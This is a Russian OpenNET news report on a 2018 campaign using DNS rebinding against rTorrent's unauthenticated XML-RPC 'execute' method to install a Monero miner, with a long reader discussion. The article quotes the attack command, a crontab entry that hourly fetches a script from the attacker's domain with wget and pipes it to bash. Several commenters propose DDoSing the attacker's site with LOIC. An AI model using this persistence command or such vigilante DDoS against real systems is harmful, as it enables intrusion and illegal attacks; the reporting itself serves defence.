The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Атака на системы с rTorrent для скрытого майнинга криптовалюты

02.03.2018 11:37

Исследователи из компании F5 выявили волну атак на пользовательские системы, в которых запущен свободный консольный torrent-клиент rTorrent, использующий XML-RPC для взаимодействия с фронтэндами с реализацией интерфейсов пользователя.

Для выполнения своего кода в системе атакующие эксплуатируют особенность реализации XML-RPC в rTorrent, в которой не отключён метод "execute", позволяющий выполнить любой shell-код в системе. В ходе атаки в систему устанавливается собранный для unix-подобных систем инструментарий для майнинга криптовалюты Monero (XMR). На текущий момент на одном из связанных с атакой кошельков уже накопилось 13 XMR, что соответствует примерно 4200 долларам США.

Как и в случае с недавней уязвимостью в BitTorrent-клиенте Transmission, интерфейс XML-RPC в rTorrent доступен без аутентификации и включает команды, которые можно использовать для выполнения кода в системе. По умолчанию rTorrent принимает запросы только на внутреннем интерфейсе localhost (127.0.0.1), недоступном извне, поэтому для отправки команд атакующие применяют технику "DNS rebinding". Атака производится когда пользователь открывает в браузере подконтрольные злоумышленнику страницы на системе в которой также выполняется rTorrent.

Выполняемый в браузере JavaScript-код отправляет произвольный запрос на localhost через вызов XMLHttpRequest(). Для обхода защиты от выхода за пределы области текущего домена (cross-origin) используется метод смены имени хоста в DNS - на DNS-сервере атакующих настраивается поочерёдная отдача двух IP-адресов: на первый запрос отдаётся реальный IP сервера со страницей, а затем возвращается 127.0.0.1. Время жизни (TTL) для первого ответа выставляется в минимальное значение, поэтому при открытии страницы браузер определяет реальный IP сервера атакущего и загружает содержимое страницы. На странице запускается JavaScript-код, который ожидает истечения TTL и отправляет второй запрос, который теперь определяет хост как 127.0.0.1, что приводит к обращению к внутреннему сетевому интерфейсу компьютера пользователя без ограничений cross-origin.

Первым делом атакующие отправляют проверочный POST запрос с XML-RPC-методом "download_list". Если запрос обработан успешно, следом отправляется запрос "execute", в ходе которого на системе пользователя выполняется команда


   echo KGNy...tCg== |base64 -d|bash

которая после декодирования из формата base64 преоборазуется в


    (crontab -l 2>/dev/null|sed '/wget/d'; echo "5 * * * * wget -qO- lyzhenko.ru/.r|bash")|crontab –

Указанный код прописывает в crontab загрузку основного скрипта, который вначале пытается завершить процессы конкурирующих вредоносных систем майнинга, удаляя процессы по маскам "miner", "xmr", "wnTKYg", "imWBR" и "ddg", а также убивает все процессы sshd.

Далее устанавливается соединение со скрытым сервисом Tor c которого загружается непосредственно приложение для майнинга. Для доступа к Tor применяется шлюз Tor2Web, позволяющий обратиться к скрытому сервису без установки Tor при помощи обычного web-запроса.



  1. Главная ссылка к новости (https://f5.com/labs/articles/t...)
  2. OpenNews: Уязвимость в BitTorrent-клиенте Transmission, позволяющая выполнить код
  3. OpenNews: Релиз qBittorrent 4.0.0
  4. OpenNews: Проект Elementary OS представил BitTorrent-клиент Torrential
  5. OpenNews: Второй взлом инфраструктуры BitTorrent-клиента Transmission
  6. OpenNews: Релиз BitTorrent-клиента KTorrent 5.0
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/48177-torrent
Ключевые слова: torrent, rtorrent
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (116) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, freehck (ok), 12:05, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Увидел новость -- написал регистратору. Больше писем -- быстрее удалят. :)
     
     
  • 2.3, Аноним (-), 12:12, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Нужно хостеру писать, а не регистратору. Это типичный взломанный сайт с необновлённым WordPress или кривым плагином, на который файлик с payload залили. Таких тысячи.
     
     
  • 3.15, Аноним (-), 13:12, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Заметьте, как на этом сайте всё прекрасно и гармонично. CMS, заголовок, его орфография, наполнение и сабжевый скрипт.
     
     
  • 4.18, сайтостроитель (?), 13:16, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Заметьте, как на этом сайте всё прекрасно и гармонично. CMS, заголовок, его
    > орфография, наполнение и сабжевый скрипт.

    йа у мамы веб-девелопер!
    (и ничем не хуже владельцев мильена аналогичных сайтов-с-cms)

     
  • 4.38, sokoloff (??), 17:28, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Это вы про 127.0.0.1? :)
     
     
  • 5.79, X4asd (ok), 14:54, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > Это вы про 127.0.0.1? :)

    заходил сюда -- не плохой сайт

     
  • 3.20, freehck (ok), 13:38, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Нужно хостеру писать, а не регистратору.

    Не один ли хрен?

     
  • 2.43, YetAnotherOnanym (ok), 19:18, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    А они в ответ: "Дорогой сэр, Вы сами обнаружили у себя этот эксплойт, или Вам кто-то напел? Рабинович с Опеннета напел? Передайте, пожалуйста мистеру Рабиновичу, что ему необходимо самостоятельно обратиться в наш абьюз-деск и быть готовым ответить на дополнительные вопросы наших сотрудников".
    Если они этого не сделают, можно писать новость о принципиально новом способе амплификации DDOS-атак - злоумышленник публикует новость на Опеннете, сотни идиотов начинают бомбить поддержку провайдера.
     
     
  • 3.48, Crazy Alex (ok), 21:50, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.
     
     
  • 4.53, freehck (ok), 22:26, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.

    Кстати, а почему бы и нет. Предлагаю начать лойс завтра в 11.

     
     
  • 5.62, Crazy Alex (ok), 04:16, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    По России? Ок
     
     
  • 6.68, freehck (ok), 11:21, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Я начал, если что.
     
     
  • 7.75, Аноним (-), 13:30, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Я начал, если что.

    Главное следить чтобы 127.0.0.1 не досталось, с DNS rebinding то :)

     
  • 7.78, Аноним (-), 14:34, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Я начал, если что.

    Напрашивается идея потестить https://www.opennet.ru/opennews/art.shtml?num=48161 на них. Но владельцы memcached'ов могут и не оценить :(

     
  • 4.74, Аноним (-), 13:22, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.

    Ударим DDoS'ом по майнингу? А вы юмористы!!! :)

     
     
  • 5.80, YetAnotherOnanym (ok), 15:49, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Тсссс! Не мешайте!
    Не забывайте, что в России уже третий месяц как год волонтёра идёт.
     
  • 5.81, Нанобот (ok), 19:13, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Запилите кто-нибудь новость "анонимы опеннета героически предотвратили атаку на rtorrent, задосив какой-то рандомный сайт в интернете"
     
  • 2.73, Аноним (-), 13:16, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Увидел новость -- написал регистратору. Больше писем -- быстрее удалят. :)

    Зато по своему забавно. Не успели написать новость про "взлом" трансмишна и отдельные горячие головы предложили rtorrent. И тут как гром среди ясного неба. А в трансмишн как раз починили, так что те кто мечется может уже драпать на трансмишн :)

     
     
  • 3.84, freehck (ok), 21:14, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ну драпать на transmission смысла не много. У rtorrent основной режим работы -- консолньый, и он данной проблемой не затронут.
     
     
  • 4.86, Аноним (-), 04:39, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну драпать на transmission смысла не много. У rtorrent основной режим работы
    > -- консолньый, и он данной проблемой не затронут.

    Лично я смысл в rtorrent вообще не понял. На графическом десктопе гуй выглядит лучше и интуитивнее. Для неинтерактивного применения типа автоматической качалки все эти консольные потуги все-равно не требуются. Один фиг пришлось RPC делать. Только в rTorrent и его сделали очень в духе остального - морда перекидывается с бэком стремными XMLками, на что забили уже даже совсем вебмакаки. А тут народ с ручника не снялся и понял XHR слишком буквально. Бонусом зависимость от жирных и вечно дырявых либ парсинга XML. Впрочем в rTorrent все так - круто, наворочено, и хрен знает зачем.

     
     
  • 5.96, freehck (ok), 11:37, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    >[оверквотинг удален]
    >> -- консолньый, и он данной проблемой не затронут.
    > Лично я смысл в rtorrent вообще не понял. На графическом десктопе гуй
    > выглядит лучше и интуитивнее. Для неинтерактивного применения типа автоматической качалки
    > все эти консольные потуги все-равно не требуются. Один фиг пришлось RPC
    > делать. Только в rTorrent и его сделали очень в духе остального
    > - морда перекидывается с бэком стремными XMLками, на что забили уже
    > даже совсем вебмакаки. А тут народ с ручника не снялся и
    > понял XHR слишком буквально. Бонусом зависимость от жирных и вечно дырявых
    > либ парсинга XML. Впрочем в rTorrent все так - круто, наворочено,
    > и хрен знает зачем.

    rtorrent

     
  • 5.103, scorry (ok), 21:27, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Лично я смысл в rtorrent вообще не понял

    Памяти ест меньше, позволяет больше торрентов качать-отдавать. Если я правильно понял ваш вопрос. конечно.

     
     
  • 6.108, Аноним (-), 08:19, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Трансмишн даже на роутере с 32 метрами по минимуму юзабелен На 64 грузит бочкам... большой текст свёрнут, показать
     
     
  • 7.116, scorry (ok), 11:05, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Я верю вашему опыту и уважаю вашу точку зрения. Но, как пользовавший оба клиента и в хвост, и в гриву, аргументированно вам заявляю: rtorrent ест меньше и качает больше, чем transmission.

    > И да, откройте секрет, как вы менеджите в интерфейсе рторента что-то типа 200 торентов? Он же лагучий и не особо информативный. Обработке через пайпы в unix стиле он тоже такой хороший не особо вроде поддается.

    Я им управляю через браузер.

     
     
  • 8.119, Аноним (-), 15:09, 09/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    У трансмишна настройки есть, знаете ли А чтобы АРГУМЕНТИРОВАННО заявлять надо н... текст свёрнут, показать
     
     
  • 9.122, scorry (ok), 15:34, 09/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ох, юноша, да я же не собираюсь с вами спорить, ни в коем случае ... текст свёрнут, показать
     
     
  • 10.123, Аноним (-), 16:18, 09/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ах, под аргументированно имелось в виду загибание пальцев и размахивание сакраль... текст свёрнут, показать
     
     
  • 11.125, scorry (ok), 02:08, 10/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Нет Трансмишн лучше, я не умею его готовить, а аноним всё знает лучше ... текст свёрнут, показать
     

  • 1.2, freehck (ok), 12:10, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    > В ходе атаки в систему устанавливается собранный для unix-подобных
    > систем инструментарий для майнинга криптовалюты Monero (XMR). На
    > текущий момент на одном из связанных с атакой кошельков уже накопилось
    > 13 XMR, что соответствует примерно 4200 долларам США.

    Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими мозгами и предприимчивостью.
    Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

     
     
  • 2.4, Аноним (-), 12:20, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +5 +/
    То что он смекалистый опровергает последняя строка кода с chmod.

    И вообще, смекалистым он бы был если бы придумал что-то новое, а не воспосльзовался наработками других людей.

     
     
  • 3.12, Аноним (12), 12:57, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > И вообще, смекалистым он бы был если бы придумал что-то новое, а не воспосльзовался наработками других людей.

    А может он намеренно косит под дурачка, чтоб его не нашли. :)

     
  • 3.14, имя (?), 13:01, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    в чем проблема с chmod? добавляет права на выполнение, запускает и затем удаляет файл
     
     
  • 4.42, RM (?), 19:10, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Я так понимаю что продвинутые админы монтируют /tmp с noexec, вот это и есть проблема конкретного chmod
     
     
  • 5.49, Crazy Alex (ok), 21:51, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Так то продвинутые
     
  • 2.16, Аноним (-), 13:13, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Можно конечно много размышлять, этично это или же нет, однако уж с
    > чем точно нельзя поспорить, так это с тем, что парень смекалистый.

    Смекалистый не спалился бы.

     
     
  • 3.77, Аноним (-), 14:31, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Смекалистый не спалился бы.

    Так спалился всего лишь какой-то бот. Если бы спалился владелец - он бы уже ожидал вызова в суд наверное, но про это в новости не говорится вроде.

     
  • 2.19, Iaaa (ok), 13:19, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими мозгами и предприимчивостью.
    > Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

    Кто-то за такие деньги 2 месяца пашет, а взломщик (вор, бандит, громила, разводила - на выбор) заработал их своими мозгами и предприимчивостью.
    Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

     
     
  • 3.39, Аноним (-), 18:51, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Вор/бандит/громила (- хз что это)/разводила такую сложную схему за всю жизнь не придумает, у них схемы то примитивные: залез в окно->натырил бижутерию->вылез/подкараулил в парке->убил->обчистил/кинул на авито заманчивую объяву->взял предоплату->выкинул симку.
     
     
  • 4.61, angra (ok), 02:25, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    То есть для тебя тоже вопрос не в этике, а в сложности? Ну так здесь ведь тоже простая схема: "создал сайт с вредоносным кодом и всё". Если тебе расписать детали "залез в окно->натырил бижутерию->вылез", то всё будет куда сложнее, чем у этого кулхацкера.
     
     
  • 5.66, Аноним (-), 10:31, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    И чем же схема "разбить окно и вытащить все ценное" сложнее чем схема в топике? Вопрос этики и вопрос сложности - разные вещи, не сваливай все в одну кучу.
     
     
  • 6.70, angra (ok), 12:10, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну ты попробуй, а потом на зоне тебе объяснят, в чем ты ошибся. Или ты про ключевой момент "как сделать так, чтобы потом не сесть за это" вообще не подумал?
     
  • 5.87, Аноним (-), 10:20, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > То есть для тебя тоже вопрос не в этике, а в сложности?

    И в этом тоже. К тому же сложным и казалось бы криминальным начинаниям часто находятся мирные применения. Например, спецы по отмычкам с удовольствием помогут вскрыть заклинивший замок в двери. И если выбирать между грубым дестроем железной двери или некоторой мздой специалисту, почему-то обладатели дверей часто предпочитают заплатить. А казалось бы, ну как может вскрытие замков быть чем-то хорошим? :)

     
  • 2.28, Ю.Т. (?), 15:04, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Можно конечно много размышлять, этично это или же нет, однако уж с
    > чем точно нельзя поспорить, так это с тем, что парень смекалистый.

    Распотешил момент насчёт прибития конкурентных майнилок.

     
  • 2.60, angra (ok), 02:16, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +4 +/
    В большинстве мест, где я работал сисадмином, у меня была возможность проявить "смекалку" и "заработать" как минимум на порядок больше "своими мозгами и предприимчивостью". Вот только у меня, в отличии от некоторых, есть совесть. У большинства моих коллег тоже, хотя были и такие, кто с ней умел договориться.
     
     
  • 3.64, freehck (ok), 10:13, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > В большинстве мест, где я работал сисадмином, у меня была возможность проявить
    > "смекалку" и "заработать" как минимум на порядок больше "своими мозгами и
    > предприимчивостью".

    Не, ну у нас-то по работе ресурс уже готовый -- бери и пользуйся. А этот парнишка сделал что-то буквально из ничего. В этом есть определённая красота всё же.

    > Вот только у меня, в отличии от некоторых, есть совесть.
    > У большинства моих коллег тоже, хотя были и такие, кто с
    > ней умел договориться.

    По поводу совести... Что ж, обладая таким доступом, он мог бы keylogger поставить, воровать номера кредитных карт, пароли. Но вместо всего этого лишь майнил.

    Другое дело, что это неуважение права частной собственности, а это нельзя оставлять безнаказанным.

     
     
     
    Часть нити удалена модератором

  • 5.83, freehck (ok), 21:08, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Надо же, коммуняжки пожаловали Угу А мир у нас чётко делится на чёрное и бе... большой текст свёрнут, показать
     
     
  • 6.85, angra (ok), 23:25, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Я был студентом в другом городе в 90-е, на месяц у меня из финансов было около ... большой текст свёрнут, показать
     
     
  • 7.88, Аноним (-), 10:24, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Вот только делали это в подавляющем большинстве случаев не для того, чтобы
    > заработать. А здесь в первую очередь было именно желание заработать.

    С другой стороны это уменьшает число дырявых сайтиков. С которых могли бы и ддосы со спамом лететь, что наверное хуже. А так урон сети минимальный, а хостеру лишний стимул выключить проблемный хост до устранения :)

     
  • 7.104, freehck (ok), 15:07, 05/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ну хз, я был студентом в конце нулевых, и на 2000 деревянных в месяц при 100 й з... большой текст свёрнут, показать
     
  • 7.105, freehck (ok), 16:06, 05/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    А вот мимо этого так же просто, как и мимо остального, пройти уже просто невозмо... большой текст свёрнут, показать
     
     
  • 8.109, Аноним (-), 08:27, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Офигенный опус мыслящего человкеа Возможно, им больше нравится протирать штаны ... большой текст свёрнут, показать
     
     
  • 9.110, Ю.Т. (?), 08:34, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ладно, ладно Ни чудес, ни сверхчеловеков не бывает А поскольку энтропию убить ... текст свёрнут, показать
     
     
  • 10.111, Аноним (-), 09:10, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Зато бывают лохи-по-жизни догадайтесь на кого я намекаю и те кто ими беспринци... большой текст свёрнут, показать
     
     
  • 11.117, Ю.Т. (?), 16:29, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Недочеловеков тоже не бывает Да какое-такое назидание Должны быть в таком ви... текст свёрнут, показать
     
     
  • 12.120, Аноним (-), 15:25, 09/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Мне бы хотелось так думать, и к этому надо стремиться наверное Но когда кем-то ... большой текст свёрнут, показать
     
  • 6.97, Аноним (-), 11:43, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Вот вы точно знаете, что у студента, например, денег точно никогда не водится. Поэтому он едет зайцем от общаги до универа с утра.

    Лично я знаю, что студенческий проездной стоит копейки, и каждый день рисковать быть как минимум ссаженным никто в здравом уме не будет.

     
     
  • 7.115, Аноним (-), 09:48, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Он стоит копейки по меркам нормального человека Который может профитом заняться... большой текст свёрнут, показать
     
  • 6.99, Ю.Т. (?), 11:57, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Мораль тут такая: воровство -- это не всегда плохо, а асоциальные личности
    > -- не всегда вредители.

    Поздравляю, вы только что переоткрыли относительный (классовый) характер морали, о котором давно говорили... кхм, кхм... "коммуняжки". :)

     
     
  • 7.112, Аноним (-), 09:15, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Поздравляю, вы только что переоткрыли относительный (классовый) характер морали, о котором
    > давно говорили... кхм, кхм... "коммуняжки". :)

    Ваша же высокая мораль обычно сводится к тому, чтобы сидя в гадюшне с голым задом порадоваться тому что у соседа корова сдохла. И еще неплохо бы калитку этому гаду сломать, а то чойта мерзавец новую поставил, да еще с свежей краской.

    Ах да, потом еще надлежит улыбнуться в лицо соседу, посочувствовать насчет калитки и задвинуть громкий тезис что ее раздолбали враги коммунизма и агенты госдепа. Как по мне - так на этом фоне мораль капиталистов не такая уж и плохая, ибо все познается в сравнении.

     
     
  • 8.118, Ю.Т. (?), 16:32, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Причём здесь наша высокая мораль Поскипанное -- ваша проекция ... текст свёрнут, показать
     
     
  • 9.121, Аноним (-), 15:31, 09/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    При чем Практика показала что обычно это сводится к чему-то такому Высокие иде... текст свёрнут, показать
     
     
  • 10.124, Ю.Т. (?), 16:28, 09/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Практика Но вы это всё только по худ литературе и знаете А наукой доказано ... текст свёрнут, показать
     
  • 4.72, Fedd (?), 13:13, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Спорю ребята из project-zero идейку подсказали https://bugs.chromium.org/p/project-zero/issues/detail?id=1524
     
  • 2.76, Аноним (-), 13:34, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими
    > мозгами и предприимчивостью.

    А еще менее смекалистые за столько могут и год-два пахать. Да еще таская какие-нибудь ящики или что там еще. Быть тупым вообще очень так себе...

     

  • 1.5, anonymous (??), 12:26, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    охренеть. какой ... такое проектировал?
     
     
  • 2.7, IB (?), 12:33, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +5 +/
    В смысле кто проектировал такой DNS?

    Знают, борются, но legacy.

    С какого перепугу локально работающее приложение на localhost должно защищаться от внешних! атак.

     
     
  • 3.29, Аноним (-), 15:08, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    С такого перепугу, что эти атаки не вчера придумали.
     
  • 3.54, Аноним (-), 22:38, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > С какого перепугу локально работающее приложение на localhost должно защищаться от внешних! атак.

    с какого перепугу докальное приложение испаользует сетевые порты а не Unix Domain Socket?

    СЕТЕВЫЕ! от слова СЕТЬ

     
     
  • 4.58, Аноним (-), 23:38, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    По умолчанию оно ни то, ни другое не использует, порты и unix-сокеты открываются специальной директивой в конфиге.

     
  • 3.89, Аноним (-), 10:25, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > С какого перепугу локально работающее приложение на localhost должно защищаться от внешних! атак.

    С такого что внезапно вебпага в браузере может взять да и попросить localhost. И вот он не такой уж и локальный оказывается. Сюрприз.

     

  • 1.6, Яйцассыром (?), 12:33, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    >> а также убивает все процессы sshd.

    Подскажите, с каких это пор, в этих наших линуксах, кто-попало может кильнуть процесс запущенный от другого пользователя?

     
     
  • 2.8, Аноним (-), 12:40, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Ну ты попробуй прибей обычным юзером sshd от рута запущенный, потом расскажи об успехах.
     
  • 2.10, imho (?), 12:46, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А кто сказал что он чужие убивает?
     
     
  • 3.17, нах (?), 13:13, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    ну как бы редко sshd запускают от юзера, лазящего по порносайтам...

    хотя...

     
  • 2.11, Аноним (-), 12:56, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Если кто-то уже вломился в систему, то скорее всего под тем же юзером. А если нет — ну что ж, не судьба, придётся конкурировать за процессор.
     

  • 1.13, Аноним (-), 12:57, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    т.е. если rtorrent висит на отдельном компе, бояться нечего?
    еще и запущен под юзером, которому не разрешено добавлять ничего в cron

    но вообще, подход конечно не радует... rtorrent интересно собирается это исправлять?

     
     
  • 2.21, Аноним (-), 13:52, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Что там исправлять? По умолчанию xmlrpc-интерфейс выключен. Если кто-то его включает на сетевом интерфейсе (а не на UNIX-сокете с ограничением прав доступа) и тем более открывает доступ к нему из сети — ССЗБ.

    А то, что xmlrpc-интерфейс позволяет выполнять команды, не намного опаснее возможности записи произвольных файлов, для предоставления которой он предназначен.

     
     
  • 3.27, нах (?), 14:42, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Что там исправлять?

    авторизацию. (и transmission туда же)
    Кстати, зачем вообще какому-то торренту уметь - exec ?

    > А то, что xmlrpc-интерфейс позволяет выполнять команды, не намного опаснее возможности записи
    > произвольных файлов

    записываем файл с эксплойтом, исполняем - и вот мы рут.
    Сама возможность записать файл - рута тебе просто так не принесет, придется сильно повозиться.

    Хотя, конечно, немодно. майнинг наше все.
    (уныло глядит на многоголовый xeon... 300 хешей максимум. Ну и чего их вот ломать?)

     
     
  • 4.35, Аноним (-), 15:59, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > (уныло глядит на многоголовый xeon... 300 хешей максимум. Ну и чего их вот ломать?)

    Курочка по зёрнышку клюёт. Вот эта на 4200$ наклевала, может и ещё успеет, пока все спохватятся.

     
  • 4.56, Аноним (-), 23:32, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Там она не предусмотрена, для авторизации предписывается использовать функционал... большой текст свёрнут, показать
     
     
  • 5.57, Аноним (-), 23:34, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > записанный .bashrc

    Или .ssh/authorized_keys.

     
  • 5.95, Аноним (-), 10:44, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > UNIX-way, каждая программа выполняет свою небольшую задачу, слышали о таком?

    Офигенное оправдание api без авторизации. Знаете, если RPC api в результате может дергать кто попало - это хреновая реализация задачи.

    Да и stdin/out/... у rtorrent парсить - как-то вообще совсем нифига не юниксвэйно, если что. Хотя половина юниксвэя была об этом.

    > rTorrent проектировался для максимального удобства грамотного пользователя,

    Он вообще проектировался? Выглядит довольно хаотично и имеет хренову кучу проблем юзабилити. В его чудном текстовом интерфейсе сложно понять чем он вообще занимается.

     
     
  • 6.100, Аноним (-), 16:11, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Офигенное оправдание api без авторизации.

    Может быть, ещё в bash сделать авторизацию при запуске интерактивной сессии? Или в netcat при принятии соединения? Или в winapi показывать окошко подтверждения при каждом вызове CreateProcess?
    Это API не для вываливания наружу, и даже не для открытия на локалхосте, если имеет значение разграничение пользователей. Если кто попало получает возможность его дёргать, то это проблема настройки системы, а не плохое API.

    > половина юниксвэя

    Но не весь. Демоны — это юниксвейно? А они обычно не используют stdin/stdout для работы.

     
     
  • 7.113, Аноним (-), 09:33, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Если внешняя страница в браузере сможет вызывать bash угодным ей образом - то та... большой текст свёрнут, показать
     
  • 4.90, Аноним (-), 10:29, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Кстати, зачем вообще какому-то торренту уметь - exec ?

    Без стремных RPC жизнь скучна. В трансмишне exec не было, но была настройка выполнения скрипта по завершении закачки. Это надеюсь понятно зачем, да? Но в конце концов и это тоже позволяет выполнить какую-нибудь забавную команду в системе.

    > Сама возможность записать файл - рута тебе просто так не принесет, придется
    > сильно повозиться.

    Открыть список CVE и скачать сплойт? Во хакерье обленилось :)

    > (уныло глядит на многоголовый xeon... 300 хешей максимум. Ну и чего их вот ломать?)

    Так это с одного 300 хешей. А если бот найдет 1000 таких, уже 300 килохешей. Две старушки - уже рубль!

     
  • 2.22, Аноним (-), 13:52, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А что ты собрался тут исправлять? Все работает так, как мы надизайнили (ц). Тут нечего исправлять, ну или по крайней мере все переделывать (к примеру, браузеры, добавлять настройки к DNS-ресолверам, ставить локальные прокси и так далее).
     

  • 1.23, Аноним (-), 14:14, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    >вначале пытается завершить процессы конкурирующих вредоносных систем майнинга, удаляя процессы по маскам "miner", "xmr", "wnTKYg", "imWBR" и "ddg"

    ну вот, раньше вирусы на дисках место освобождали, сжимая и распаковывая программки на лету, теперь они еще друг друга будут уничтожать...
    - Значит всем инфицированным скачать с торента наш антивирус.
    - А запускать как?
    - Запускать вам уже не надо...

     
  • 1.25, Аноним (-), 14:26, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Дожили
    конкурирующие вредоносные системы майнинга
    на компе подцепить можно

     
     
  • 2.41, Диалектик (?), 19:05, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Воспринимай это как новый виток борьбы за безопасность ПО на машинах пользователей, кстати подкреплённый финансовым интересом, а значит крайне эффективный виток!
     
  • 2.50, Crazy Alex (ok), 22:18, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Вирусы друг друга в винде, помнится, тоже выносили
     
     
  • 3.67, ПупкинВасуасилий (?), 11:20, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
